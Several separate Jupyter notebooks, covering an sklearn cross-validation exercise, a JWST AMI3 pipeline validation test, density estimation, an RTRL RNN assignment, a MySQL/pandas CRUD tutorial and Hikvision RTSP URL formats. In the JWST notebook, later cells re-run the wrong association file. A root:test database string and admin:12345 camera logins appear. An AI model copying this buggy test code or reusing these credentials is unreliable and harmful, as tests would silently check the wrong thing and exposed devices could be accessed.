<div class="toc"><ul class="toc-item"><li><span><a href="#DataFrame" data-toc-modified-id="DataFrame-1"><span class="toc-item-num">1 </span>DataFrame</a></span></li><li><span><a href="#Train/Test-데이터-나누어-학습하기" data-toc-modified-id="Train/Test-데이터-나누어-학습하기-2"><span class="toc-item-num">2 </span>Train/Test 데이터 나누어 학습하기</a></span></li><li><span><a href="#데이터-학습-및-평가하기" data-toc-modified-id="데이터-학습-및-평가하기-3"><span class="toc-item-num">3 </span>데이터 학습 및 평가하기</a></span></li><li><span><a href="#교차-검증-(Cross-Validation)" data-toc-modified-id="교차-검증-(Cross-Validation)-4"><span class="toc-item-num">4 </span>교차 검증 (Cross Validation)</a></span><ul class="toc-item"><li><span><a href="#교차검증-종류" data-toc-modified-id="교차검증-종류-4.1"><span class="toc-item-num">4.1 </span>교차검증 종류</a></span></li><li><span><a href="#Kfold" data-toc-modified-id="Kfold-4.2"><span class="toc-item-num">4.2 </span>Kfold</a></span></li><li><span><a href="#StratifiedKFold" data-toc-modified-id="StratifiedKFold-4.3"><span class="toc-item-num">4.3 </span>StratifiedKFold</a></span></li><li><span><a href="#LeaveOnOut" data-toc-modified-id="LeaveOnOut-4.4"><span class="toc-item-num">4.4 </span>LeaveOnOut</a></span></li></ul></li></ul></div>
```
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import *
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
```
## DataFrame
```
iris = load_iris()
iris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names)
iris_df['label'] = iris.target
iris_df
iris_df.shape
```
## Train/Test 데이터 나누어 학습하기
```
X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target,
test_size = 0.3,
random_state = 100)
```
## 데이터 학습 및 평가하기
사용 할 모델_ LGBM
```python
from lightgbm import LGBMClassifier
model_lgbm = LGBMClassifier() # 모델정의하기
model_lgbm.fit(???,???) # 모델학습
model_lgbm.score(???,???) # 모델점수보기
model_lgbm.predict(???,???) # 모델 학습결과저장
```
```
# 모델정의하기
# 모델학습
# 모델점수보기
# 모델 학습결과저장
```
## 교차 검증 (Cross Validation)
### 교차검증 종류
1. K-fold Cross-validation
- 데이터셋을 K개의 sub-set으로 분리하는 방법
- 분리된 K개의 sub-set중 하나만 제외한 K-1개의 sub-sets를 training set으로 이용하여 K개의 모델 추정
- 일반적으로 K=5, K=10 사용 (-> 논문참고)
- K가 적어질수록 모델의 평가는 편중될 수 밖에 없음
- K가 높을수록 평가의 bias(편중된 정도)는 낮아지지만, 결과의 분산이 높을 수 있음
2. LOOCV (Leave-one-out Cross-validation)
- fold 하나에 샘플 하나만 들어있는 K겹 교차 검증
- K를 전체 숫자로 설정하여 각 관측치가 데이터 세트에서 제외될 수 있도록 함
- 데이터셋이 클 때는 시간이 매우 오래 걸리지만, 작은 데이터셋에서는 좋은 결과를 만들어 냄
- 장점 : Data set에서 낭비 Data 없음
- 단점 : 측정 및 평가 고비용 소요
3. Stratified K-fold Cross-validation
- 정답값이 모든 fold에서 대략 동일하도록 선택됨
- 각 fold가 전체를 잘 대표할 수 있도록 데이터를 재배열하는 프로세스
### Kfold
```python
from sklearn.model_selection import KFold
kfold = KFold(n_splits = 5, shuffle=False) # 교차검증 방법 설정
from sklearn.model_selection import cross_val_score, cross_validate
cross_val_score(????, iris.data, iris.target, cv=kfold)
```
### StratifiedKFold
```python
from sklearn.model_selection import StratifiedKFold
skfold = StratifiedKFold(n_splits = 5, shuffle=False) #교차검증 방법 설정
cross_val_score(???,
iris.data,
iris.target,
cv=skfold # 나눌 덩어리 횟수
)
```
### LeaveOnOut
```python
from sklearn.model_selection import LeaveOneOut
leavefold = LeaveOneOut() #교차검증 방법 설정
cross_val_score(???,
iris.data,
iris.target,
cv=leavefold # 나눌 덩어리 횟수
)
```
|
github_jupyter
|
<a id="title_ID"></a>
# JWST Pipeline Validation Notebook: AMI3, AMI3 Pipeline
<span style="color:red"> **Instruments Affected**</span>: NIRISS
### Table of Contents
<div style="text-align: left">
<br> [Introduction](#intro)
<br> [JWST CalWG Algorithm](#algorithm)
<br> [Defining Terms](#terms)
<br> [Test Description](#description)
<br> [Data Description](#data_descr)
<br> [Set up Temporary Directory](#tempdir)
<br> [Imports](#imports)
<br> [Loading the Data](#data_load)
<br> [Run the Pipeline](#pipeline)
<br> [Test Results](#testing)
<br> [About This Notebook](#about)
</div>
<a id="intro"></a>
# Introduction
The notebook verifies that pipeline steps from `calwebb_detector1` through `calwebb_image2` and `calwebb_ami3` run without crashing. `calwebb_ami3` is run on various associations of target and calibrator pairs.
For more information on the `calwebb_ami3` pipeline stage visit the links below.
> Stage description: https://jwst-pipeline.readthedocs.io/en/latest/jwst/pipeline/calwebb_ami3.html
>
> Pipeline code: https://github.com/spacetelescope/jwst/tree/master/jwst/ami
[Top of Page](#title_ID)
<a id="algorithm"></a>
# JWST CalWG Algorithm
`calwebb_ami3` is based on the `implaneia` algorithm:
> https://github.com/anand0xff/ImPlaneIA/tree/delivery
[Top of Page](#title_ID)
<a id="terms"></a>
# Defining Terms
Calibrator: reference star to measure PSF to calibrate out instrumental contributions to the interferometric observables
PSF: point spread function
Target: source of interest for science program
[Top of Page](#title_ID)
<a id="description"></a>
# Test Description
This test checks that simulated data runs through the `calwebb_detector1`, `calwebb_image2`, and `calwebb_ami3` steps of the pipeline without crashing. Association files are created for the target/calibrator pair at different dither positions. The notebook verifies that the `calwebb_ami3` runs on these association files.
[Top of Page](#title_ID)
<a id="data_descr"></a>
# Data Description
The data for this test are simulated AMI datasets that do not have bad pixels. The simulated source data is AB Dor, which is simulated with a 4-point dither pattern:
| Source | Filename| Dither Position |
|:----------------|:---------|:-----------------|
|AB Dor (Target) |jw01093001001_01101_00005_nis_uncal.fits| 1|
| |jw01093001001_01101_00006_nis_uncal.fits| 2 |
| |jw01093001001_01101_00007_nis_uncal.fits| 3 |
| |jw01093001001_01101_00005_nis_uncal.fits| 4 |
HD 37093 is the PSF reference star, which is also simulated with a 4-point dither pattern.
| Source | Filename| Dither Position |
|:----------------|:---------|:-----------------|
|HD 37093 (Calibrator)| jw01093002001_01101_00005_nis_uncal.fits | 1 |
| |jw01093002001_01101_00006_nis_uncal.fits | 2 |
| |jw01093002001_01101_00007_nis_uncal.fits | 3 |
| |jw01093002001_01101_00005_nis_uncal.fits | 4 |
Configuration files are also needed for the various `calwebb_ami3` steps:
- ami_analyze.cfg
- ami_normalize.cfg
- ami_average.cfg
- calwebb_ami3.cfig
Specific reference files are needed for the analysis, which also do not have bad pixels, and are loaded with this notebook.
[Top of Page](#title_ID)
<a id="tempdir"></a>
# Set up Temporary Directory
[Top of Page](#title_ID)
```
use_tempdir = True
# Create a temporary directory to hold notebook output, and change the working directory to that directory.
from tempfile import TemporaryDirectory
import os
import shutil
if use_tempdir:
data_dir = TemporaryDirectory()
# Save original directory
orig_dir = os.getcwd()
# Move to new directory
odir = data_dir.name
os.chdir(data_dir.name)
# For info, print out where the script is running
print("Running in {}".format(os.getcwd()))
import os
if 'CRDS_CACHE_TYPE' in os.environ:
if os.environ['CRDS_CACHE_TYPE'] == 'local':
os.environ['CRDS_PATH'] = os.path.join(os.environ['HOME'], 'crds', 'cache')
elif os.path.isdir(os.environ['CRDS_CACHE_TYPE']):
os.environ['CRDS_PATH'] = os.environ['CRDS_CACHE_TYPE']
print('CRDS cache location: {}'.format(os.environ['CRDS_PATH']))
```
<a id="imports"></a>
# Imports
List the package imports and why they are relevant to this notebook.
* astropy.io for opening fits files
* numpy for working with arrays
* IPython.display for printing markdown output
* jwst.datamodels for building model for JWST Pipeline
* jwst.pipeline.collect_pipeline_cfgs for gathering configuration files
* jwst.pipeline for initiating various pipeline stages
* jwst.ami to call the AMI Analyze step
* jwst.associations for using association files
* from ci_watson.artifactory_helpers import get_bigdata for reading data from Artifactory
[Top of Page](#title_ID)
```
from astropy.io import fits
import numpy as np
from IPython.display import Markdown
from jwst.datamodels import ImageModel
import jwst.datamodels as datamodels
from jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs
from jwst.pipeline import Detector1Pipeline, Image2Pipeline, Image3Pipeline, Ami3Pipeline
from jwst.ami import AmiAnalyzeStep
from jwst.associations import asn_from_list
from jwst.associations.lib.rules_level3_base import DMS_Level3_Base
from ci_watson.artifactory_helpers import get_bigdata
```
<a id="data_load"></a>
# Loading the Data
[Top of Page](#title_ID)
```
# Data files that will be imported by Artifactory:
datafiles = np.array(['jw01093001001_01101_00005_nis_uncal.fits',
'jw01093001001_01101_00006_nis_uncal.fits',
'jw01093001001_01101_00007_nis_uncal.fits',
'jw01093001001_01101_00008_nis_uncal.fits',
'jw01093002001_01101_00005_nis_uncal.fits',
'jw01093002001_01101_00006_nis_uncal.fits',
'jw01093002001_01101_00007_nis_uncal.fits',
'jw01093002001_01101_00008_nis_uncal.fits'])
# Read in reference files needed for this analysis (these don't have bad pixels, like simulations)
superbiasfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_superbias_sim.fits')
darkfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_dark_sub80_sim.fits')
flatfile = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'jwst_niriss_flat_general.fits')
# Read in configuration files
ami_analyze_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_analyze.cfg')
ami_normalize_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_normalize.cfg')
ami_average_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'ami_average.cfg')
calwebb_ami3_cfg = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
'calwebb_ami3.cfg')
```
<a id="pipeline"></a>
# Run the Pipeline
Since this notebook tests whether the pipeline runs on all the datasets, we will run each stage of the pipeline in separate cells. That way, if a step fails, it will be easier to track down at what stage and step this error occurred.
[Top of Page](#title_ID)
## Run Detector1 stage of the pipeline to calibrate \*\_uncal.fits file
```
for file in datafiles:
df = get_bigdata('jwst_validation_notebooks',
'validation_data',
'ami_analyze',
file)
# Modify a keyword in each data file: only necessary for now
# Next three lines are temporary to accommodate recent changes to Mirage and pipeline
# and for Mirage to work with the pipeline.
with datamodels.open(df) as model:
model.meta.dither.dither_points = int(model.meta.dither.dither_points)
model.save(df)
# Run Detector1 stage of pipeline, specifying superbias and dark reference files
result1 = Detector1Pipeline()
result1.superbias.override_superbias = superbiasfile
result1.dark_current.override_dark = darkfile
result1.ipc.skip = True
result1.save_results = True
result1.output_dir = odir
result1.run(df)
```
## Run Image2 stage of the pipeline to calibrate \*\_rate.fits file
```
for df in datafiles:
# Run Image2 stage of the pipeline on the file created above to create rate file,
# specifying flat field file
df_rate = os.path.join(odir, os.path.basename(df.replace('uncal','rate')))
result2 = Image2Pipeline()
result2.flat_field.override_flat = flatfile
result2.photom.skip = True
result2.resample.skip = True
result2.save_results = True
result2.output_dir = odir
result2.run(df_rate)
```
## Run Image2 stage of the pipeline to calibrate \*\_rateints.fits file
```
for df in datafiles:
# Run Image stage of the pipeline to create rateints file, specifying flat field file
df_rateints = os.path.join(odir,os.path.basename(df.replace('uncal','rateints')))
result3 = Image2Pipeline()
result3.flat_field.override_flat = flatfile
result3.photom.skip = True
result3.resample.skip = True
result3.save_results = True
result3.output_dir = odir
result3.run(df_rateints)
```
## Run AmiAnalyze step on the \*\_cal.fits files created above
```
for df in datafiles:
# Set up name of calibrated file
df_cal = os.path.join(odir,os.path.basename(df.replace('uncal','cal')))
# Run AMI Analyze Step of the pipeline
result5 = AmiAnalyzeStep.call(df_cal, config_file = ami_analyze_cfg,
output_dir = odir, save_results = True)
```
## Run AmiAnalyze on various target/calibrator pairs
Create association files to test calibration of target at different dither positions. Run AmiAnalyze on these association files.
Note: the `program` and `targ_name` fields in the association files are the same for all pairs, so I have them set as default values in the `create_asn` routine.
Routine for creating association files (in \*.json format)
```
def create_asn(outdir, targ1, psf1, prod_name, out_file, asn_id,
program="1093_2_targets_f480m_2022.25coords_pipetesting",
targ_name='t001',
targ2=None, psf2=None):
# Create association file:
asn = asn_from_list.asn_from_list([os.path.join(outdir,targ1)],
product_name = prod_name,
output_file = os.path.join(outdir,out_file),
output_dir = outdir,rule = DMS_Level3_Base)
asn['products'][0]['members'].append({'expname': os.path.join(odir,psf1),
'exptype': 'psf'})
# check whether 2nd set of target/calibrator pairs was inputted
if targ2 is not None:
asn['products'][0]['members'].append({'expname':os.path.join(odir,targ2),
'exptype': 'science'})
asn['products'][0]['members'].append({'expname':os.path.join(odir,psf2),
'exptype': 'psf'})
asn['asn_type'] = 'ami3'
asn['asn_id'] = asn_id
asn['program'] = program
asn['target'] = targ_name
with open(os.path.join(outdir,out_file), 'w') as fp:
fp.write(asn.dump()[1])
fp.close()
```
### Create association files and run AmiAnalyze on these pairs
Association file 1 to calibrate average of targets at dithers 2 and 3 with the average of calibrators at dithers 2 and 3.
```
asn1_file = "ami_asn001_targets23_cals23.json"
targ1 = "jw01093001001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093001001_01101"
asn_id = '001'
# Add second target/calibrator pair at this dither step
targ2 = "jw01093001001_01101_00007_nis_cal.fits"
psf2 = "jw01093002001_01101_00007_nis_cal.fits"
create_asn(odir, targ1, psf1, prod_name, asn1_file, asn_id, targ2=targ2, psf2=psf2)
# Run AmiAnalyze
Ami3Pipeline.call(asn1_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 2 to calibrate target at POS1 with calibrator at POS1
```
# Create association file:
asn2_file = "ami_asn002_calibrate_targ1_cal1.json"
targ1 = "jw01093001001_01101_00005_nis_cal.fits"
psf1 = 'jw01093002001_01101_00005_nis_cal.fits'
prod_name = "jw01093001001_01101_00005cal00005"
asn_id = '002'
create_asn(odir, targ1, psf1,prod_name, asn2_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn2_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 3 to calibrate target at POS2 with calibrator at POS2
```
# Create association file:
asn3_file = "ami_asn003_calibrate_targ2_cal2.json"
targ1 = "jw01093001001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093001001_01101_00006cal00006"
asn_id = '003'
create_asn(odir, targ1, psf1, prod_name, asn3_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 4 to calibrate target at POS3 with calibrator at POS3
```
# Create association file:
asn4_file = "ami_asn004_calibrate_targ3_cal3.json"
targ1 = "jw01093001001_01101_00007_nis_cal.fits"
psf1 = "jw01093002001_01101_00007_nis_cal.fits"
prod_name = "jw01093001001_01101_00007cal00007"
asn_id = '004'
create_asn(odir, targ1, psf1, prod_name, asn4_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 5 to calibrate target at POS4 with calibrator at POS4
```
# Create association file:
asn5_file = "ami_asn005_calibrate_targ4_cal4.json"
targ1 = "jw01093001001_01101_00008_nis_cal.fits"
psf1 = "jw01093002001_01101_00008_nis_cal.fits"
prod_name = "jw01093001001_01101_00008cal00008"
asn_id = '005'
create_asn(odir, targ1, psf1, prod_name, asn5_file, asn_id)
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 6 to calibrate calibrator at POS2 with calibrator at POS3
```
# Create association file:
asn6_file = "ami_asn006_calibrate_cal2_cal3.json"
targ1 = "jw01093002001_01101_00006_nis_cal.fits"
psf1 = "jw01093002001_01101_00007_nis_cal.fits"
prod_name = "jw01093002001_01101_00006cal00007"
asn_id = '006'
create_asn(odir, targ1, psf1, prod_name, asn6_file, asn_id, targ_name='t002')
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
Association file 7 to calibrate calibrator at POS3 with calibrator at POS2
```
# Create association file:
asn7_file = "ami_asn007_calibrate_cal3_cal2.json"
targ1 = "jw01093002001_01101_00007_nis_cal.fits"
psf1 = "jw01093002001_01101_00006_nis_cal.fits"
prod_name = "jw01093002001_01101_00007cal00006"
asn_id = '007'
create_asn(odir, targ1, psf1, prod_name, asn7_file, asn_id, targ_name='t002')
# Run AmiAnalyze
Ami3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir)
```
<a id="testing"></a>
# Test Results
Did the above cells run without errors? If so, **huzzah** the test passed!
If not, track down why the pipeline failed to run on these datasets.
[Top of Page](#title_ID)
<a id="about_ID"></a>
## About this Notebook
**Authors:** Deepashri Thatte, Senior Staff Scientist, NIRISS
<br>Stephanie LaMassa, Scientist, NIRISS
<br>**Updated On:** 08/04/2021
[Top of Page](#title_ID)
<img style="float: right;" src="./stsci_pri_combo_mark_horizonal_white_bkgd.png" alt="stsci_pri_combo_mark_horizonal_white_bkgd" width="200px"/>
|
github_jupyter
|
# Density estimation demo
Here we demonstrate how to use the ``inference.pdf`` module for estimating univariate probability density functions from sample data.
```
from numpy import linspace, zeros, exp, log, sqrt, pi
from numpy.random import normal, exponential
from scipy.special import erfc
import matplotlib.pyplot as plt
```
## Kernel-density estimation
Gaussian kernel-density estimation is implemented via the `GaussianKDE` class:
```
# generate some sample data to use as a test-case
N = 150000
sample = zeros(N)
sample[:N//3] = normal(size=N//3)*0.5 + 1.8
sample[N//3:] = normal(size=2*(N//3))*0.5 + 3.5
# GaussianKDE takes an array of sample values as its only argument
from inference.pdf import GaussianKDE
PDF = GaussianKDE(sample)
```
Instances of density estimator classes like `GaussianKDE` can be called as functions to return the estimate of the PDF at given spatial points:
```
x = linspace(0, 6, 1000) # make an axis on which to evaluate the PDF estimate
p = PDF(x) # call the instance to get the estimate
```
We could plot the estimate manually, but for convenience the `plot_summary()` method will generate a plot automatically as well as summary statistics:
```
PDF.plot_summary()
```
The summary statistics can be accessed via properties or methods:
```
# the location of the mode is a property
mode = PDF.mode
# The highest-density interval for any fraction of total probability is returned by the interval() method
hdi_95 = PDF.interval(frac = 0.95)
# the mean, variance, skewness and excess kurtosis are returned by the moments() method:
mean, variance, skewness, kurtosis = PDF.moments()
```
By default, `GaussianKDE` uses a simple but easy to compute estimate of the bandwidth (the standard deviation of each Gaussian kernel).
However, when estimating strongly non-normal distributions, this simple approach will over-estimate required bandwidth.
In these cases, the cross-validation bandwidth selector can be used to obtain better results, but with higher computational cost.
```
# to demonstrate, lets create a new sample:
N = 30000
sample = zeros(N)
sample[:N//3] = normal(size=N//3)
sample[N//3:] = normal(size=2*(N//3)) + 10
# now construct estimators using the simple and cross-validation estimators
pdf_simple = GaussianKDE(sample)
pdf_crossval = GaussianKDE(sample, cross_validation = True)
# now build an axis on which to evaluate the estimates
x = linspace(-4,14,500)
# for comparison also compute the real distribution
exact = (exp(-0.5*x**2)/3 + 2*exp(-0.5*(x-10)**2)/3)/sqrt(2*pi)
# plot everything together
plt.plot(x, pdf_simple(x), label = 'simple')
plt.plot(x, pdf_crossval(x), label = 'cross-validation')
plt.plot(x, exact, label = 'exact')
plt.ylabel('probability density')
plt.xlabel('x')
plt.grid()
plt.legend()
plt.show()
```
## Functional density estimation for unimodal PDFs
If we know that the distribution being estimated is a single (but potentially highly skewed) peak, the `UnimodalPdf` class can robustly estimate the PDF even at smaller sample sizes. It works by fitting a heavily modified Student-t distribution to the sample data.
```
# Create some samples from the exponentially-modified Gaussian distribution
L = 0.3 # decay constant of the exponential distribution
sample = normal(size = 3000) + exponential(scale = 1./L, size = 3000)
# create an instance of the density estimator
from inference.pdf import UnimodalPdf
PDF = UnimodalPdf(sample)
# plot the estimate along with the exact PDF for comparison
x = linspace(-5, 15, 1000)
exact = 0.5*L*exp(0.5*L*(L-2*x))*erfc((L-x)/sqrt(2)) # exact PDF for the exp-gaussian distribution
plt.plot(x, PDF(x), label = 'UnimodalPdf estimate', lw = 3)
plt.plot(x, exact, label = 'exact distribution', ls = 'dashed', lw = 3)
plt.ylabel('probability density')
plt.xlabel('x')
plt.legend()
plt.grid()
plt.tight_layout()
plt.show()
```
|
github_jupyter
|
# Assignment 3: RTRL
Implement an RNN with RTRL. The ds/dw partial derivative is 2D hidden x (self.n_hidden * self.n_input) instead of 3d.
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
class RNN(object):
def __init__(self, n_input, n_hidden, n_output):
# init weights and biases
self.n_input = n_input
self.n_hidden = n_hidden
self.n_output = n_output
self.W = np.random.normal(scale=0.1, size=(n_hidden, n_input))
self.R = np.eye(n_hidden)
self.V = np.random.normal(scale=0.1, size=(n_output, n_hidden))
self.bh = np.zeros((n_hidden, 1))
self.bo = np.zeros((n_output, 1))
self.grad = {}
self.reset()
def reset(self):
# init hidden activation
self.s = np.zeros((self.n_hidden, 1))
self.a = np.zeros((self.n_hidden, 1))
# init buffers for recursive gradients
self.ds_dW = np.zeros((self.n_hidden, self.n_hidden * self.n_input))
self.ds_dR = np.zeros((self.n_hidden, self.n_hidden * self.n_hidden))
self.ds_db = np.zeros((self.n_hidden, self.n_hidden))
def forward(self, x):
assert x.shape[1] == self.n_input
assert len(x.shape) == 2
"""your code goes here, method must return model's prediction"""
# partial derivative for accumulation. this is the R * f' * f that can be reused
der = self.R * np.tile(1-self.a**2, self.n_hidden)
# accumulate gradients
self.ds_dW = der @ self.ds_dW + np.kron(np.eye(self.n_hidden), x)
self.ds_dR = der @ self.ds_dR + np.kron(np.eye(self.n_hidden), self.a.T)
self.ds_db = der @ self.ds_db + np.eye(self.n_hidden)
# do regular 1 step forward pass
self.s = self.W @ x.T + self.R @ self.a + self.bh
self.a = np.tanh(self.s) # can be reused in backward pass
return (self.V @ self.a + self.bo).T
def backward(self, y_hat, y):
assert y_hat.shape[1] == self.n_output
assert len(y_hat.shape) == 2
assert y_hat.shape == y.shape, f"shape mismatch {y_hat.shape} {y.shape}"
e = (y_hat - y).T # error == derivative{L}/derivative{s} == dL_dy
dL_ds = ((self.V.T @ e) * (1 - self.a**2)) # transposed to fit shape
# 1:1 copy from ex1, only depend on error
self.grad["bo"] = e
self.grad["V"] = e @ self.a.T
# collect new gradients
self.grad["W"] = (self.ds_dW.T @ dL_ds).reshape(self.W.shape)
self.grad["R"] = (self.ds_dR.T @ dL_ds).reshape(self.R.shape).T
self.grad["bh"]= self.ds_db.T @ dL_ds
# compute loss (halved squared error)
return np.sum(0.5 * (y - y_hat)**2)
def fast_forward(self, x_seq):
# this is a forward pass without gradient computation for gradient checking
s = np.zeros_like(self.s)
for x in x_seq:
s = self.W @ x.reshape(*x.shape, 1) + self.R.T @ np.tanh(s) + self.bh
return self.V @ np.tanh(s) + self.bo
def gradient_check(self, x, y, eps=1e-5, thresh=1e-5, verbose=True):
for name, ga in self.grad.items():
if verbose:
print("weight\t",name)
gn = np.zeros_like(ga)
w = self.__dict__[name]
for idx, w_orig in np.ndenumerate(w):
w[idx] = w_orig + eps/2
hi = np.sum(0.5 * (y - self.fast_forward(x))**2)
w[idx] = w_orig - eps/2
lo = np.sum(0.5 * (y - self.fast_forward(x))**2)
w[idx] = w_orig
gn[idx] = (hi - lo) / eps
dev = abs(gn[idx] - ga[idx])
if verbose: # extended error
print(f"numeric {gn[idx]}\tanalytic {ga[idx]}\tdeviation {dev}")
assert dev < thresh
def update(self, eta):
# update weights
for name, grad in self.grad.items():
self.__dict__[name] -= eta * grad
def generate_samples(seq_length, batch_size, input_size):
while True:
x = np.random.uniform(low=-1, high=1, size=(seq_length, batch_size, input_size))
y = x[0,:,:]
yield x, y
def check_gradients():
rnn = RNN(2, 5, 2)
data = generate_samples(seq_length=10, batch_size=1, input_size=2)
for i, (x, y) in zip(range(1), data):
rnn.reset()
for x_t in x:
y_hat = rnn.forward(x_t)
rnn.backward(y_hat, y)
rnn.gradient_check(x, y.T)
check_gradients()
```
# Train gradient and plot weights
```
def train():
iter_steps = 15000
lr = 1e-2
seq_length = 5
rnn = RNN(1, 10, 1)
data = generate_samples(seq_length=seq_length, batch_size=1, input_size=1)
loss = []
for i, (x, y) in zip(range(iter_steps), data):
rnn.reset()
for x_t in x:
y_hat = rnn.forward(x_t)
loss.append(rnn.backward(y_hat, y))
rnn.update(lr)
# plot learnin g curve
plt.title('sequence length %d' % seq_length)
plt.plot(range(len(loss)), loss)
plt.show()
train()
```
|
github_jupyter
|
===============================
### IMPORTS & GET DATABASE INFO
```
from jsons import read_json_to_dict
from mysql_driver import MySQL
import pandas as pd
from sqlalchemy import create_engine
json_readed = read_json_to_dict("sql_server_settings.json")
IP_DNS = json_readed["IP_DNS"]
USER = json_readed["USER"]
PASSWORD = json_readed["PASSWORD"]
BD_NAME = json_readed["BD_NAME"]
PORT = json_readed["PORT"]
# Connect to MySQL
mysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)
mysql_db.connect()
```
==============
### DROP TABLE
```
# Drop table if it already exist using execute() method.
#mysql_db.cursor.execute("DROP TABLE IF EXISTS people")
mysql_db.execute_interactive_sql(sql="DROP TABLE IF EXISTS people")
```
==============
### CREATE TABLE
```
# Create table as per requirement
create_table_sql = """CREATE TABLE people(
ID INT(11) NOT NULL AUTO_INCREMENT,
MOMENTO TIMESTAMP NOT NULL,
NOMBRE VARCHAR(20) NOT NULL,
APELLIDOS VARCHAR(100) NOT NULL,
DIRECCION VARCHAR(50),
EDAD INT,
NOTA VARCHAR(40),
PRIMARY KEY (ID))"""
mysql_db.execute_interactive_sql(sql=create_table_sql)
```
==============
### SELECT TABLE
```
# Select
select_sql = """SELECT * FROM people"""
select_result = mysql_db.execute_get_sql(sql=select_sql)
# tupla de tuplas
type(select_result)
select_result
```
==============
### INSERT TABLE
```
# Insert
to_insert_1 = ["Pepito", "Wolfram_Eustaquio", "Calle Bellavista 9º-B", "67", "Enfermedad: Ceguera"]
to_insert_2 = ["Juanita", "Data Science", "Calle Recoletos", "15", "Está muy alegre siempre"]
sql_to_insert_1 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_1)
sql_to_insert_2 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_2)
sql_to_insert_1
# Otra forma de insert
mysql_db.execute_interactive_sql(sql="""INSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')""")
mysql_db.execute_interactive_sql(sql=sql_to_insert_1)
mysql_db.execute_interactive_sql(sql=sql_to_insert_2)
```
=====================
### SELECT COLUMNS
```
select_sql = """SELECT * FROM people"""
select_result = mysql_db.execute_get_sql(sql=select_sql)
select_result
```
### Select with pandas
```
import pymysql
mysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)
# Version 1
db = mysql_db.connect()
df = pd.read_sql("select * from people", con=db)
df
# Version 2
db_connection_str = mysql_db.SQL_ALCHEMY
#string = 'mysql+pymysql://root:test@98.76.54.32:20001/datasciencetb_db'
db_connection = create_engine(db_connection_str)
df = pd.read_sql("select * from people", con=db_connection)
pd.set_option('display.expand_frame_repr', False)
df
```
### Insert from pandas
```
table_to_insert = "people"
df_to_insert = df.drop(columns=["ID"])
# if_exists tiene dos posibilidades:
to_append = "append"
to_replace = "replace"
try:
frame_sql = df_to_insert.to_sql(name=table_to_insert, con=db_connection, if_exists="append", index=False)
print("Success")
except Exception as error:
print(error)
```
=============================
### Drop row
```
sql_drop = """DELETE FROM people WHERE NOMBRE='Pepito';"""
mysql_db.execute_interactive_sql(sql=sql_drop)
```
=============================
### Update row
```
#CRUD:
#Create
#Replace
#Update
#Delete
sql_update = """UPDATE people set EDAD=102 WHERE NOMBRE='Juanita';"""
mysql_db.execute_interactive_sql(sql=sql_update)
mysql_db.close()
```
### Ejemplo trabajar directamente con pandas
```
# Version 2
db_connection_str = mysql_db.SQL_ALCHEMY
#string = 'mysql+pymysql://root:test@98.76.54.32:20001/datasciencetb_db'
#db_connection = create_engine(string)
db_connection = create_engine(db_connection_str)
df1 = pd.read_sql("select * from people", con=db_connection)
df1
df1 = df1[df1.ID <= 5]
df1
# Example
table_to_insert = "people"
to_append = "append"
to_replace = "replace"
try:
frame_sql = df1.to_sql(name="people", con=db_connection, if_exists="replace", index=False)
print("Success")
except Exception as error:
print(error)
```
### Interactuando directamente con la base de datos sin pasar por pandas
```
sql2 = """DELETE FROM people WHERE ID>5;"""
mysql_db.execute_interactive_sql(sql=sql2)
```
|
github_jupyter
|
# 各主流摄像头的rtsp地址格式
## 海康威视
### IPC 摄像头
>rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream
说明:
- username: 用户名。例如admin。
- password: 密码。例如12345。
- ip: 为设备IP。例如 192.0.0.64。
- port: 端口号默认为554,若为默认可不填写。
- codec:有h264、MPEG-4、mpeg4这几种。
- channel: 通道号,起始为1。例如通道1,则为ch1。
- subtype: 码流类型,主码流为main,辅码流为sub。
**例如**,请求海康摄像机通道1的主码流,Url如下
主码流:
- rtsp://admin:12345@192.0.0.64:554/h264/ch1/main/av_stream
- rtsp://admin:12345@192.0.0.64:554/MPEG-4/ch1/main/av_stream
子码流:
- rtsp://admin:12345@192.0.0.64/mpeg4/ch1/sub/av_stream
- rtsp://admin:12345@192.0.0.64/h264/ch1/sub/av_stream
### NVR
海康新版本,DS系列
